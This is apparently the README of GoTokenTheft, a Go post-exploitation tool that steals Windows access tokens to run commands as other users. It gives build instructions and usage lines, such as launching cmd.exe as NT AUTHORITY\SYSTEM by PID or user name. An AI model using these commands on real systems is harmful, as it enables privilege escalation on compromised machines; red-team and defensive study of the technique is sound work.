GoTokenTheft
January 11, 2025 · View on GitHub
Go 编写的 Token 窃取工具,用于后渗透时在目标机器上使用不同的用户权限来执行程序和命令
Important
Token 窃取的前提是需要启用 SeDebugPrivilege,在大多数后渗透场景下是 NT AUTHORITY\SYSTEM 权限或者 bypass UAC之后的人类用户权限,比如Administrator
编译
Windows 下编译
go build -o GoTokenTheft.exe main.go
跨平台编译
GOOS=windows GOARCH=386 CC="i686-w64-mingw32-gcc" go build -o GoTokenTheft.exe main.go
使用
快速上手
指定进程
Usage:
GoTokenTheft.exe -p <pid> -c <command>
e.g.
GoTokenTheft.exe -p 114514 -c cmd.exe
指定用户
Usage:
GoTokenTheft.exe -u <user> -c <command>
e.g.
GoTokenTheft.exe -u "NT AUTHORITY\SYSTEM" -c cmd.exe
其他用法
查看系统内存在的所有token信息,包括权限和使用它的进程 pid,在实战场景下方便快速定位需要的token
GoTokenTheft.exe -t
查看系统内存在的所有进程信息,包括 pid 和进程名
GoTokenTheft.exe -p
查看帮助
GoTokenTheft.exe -h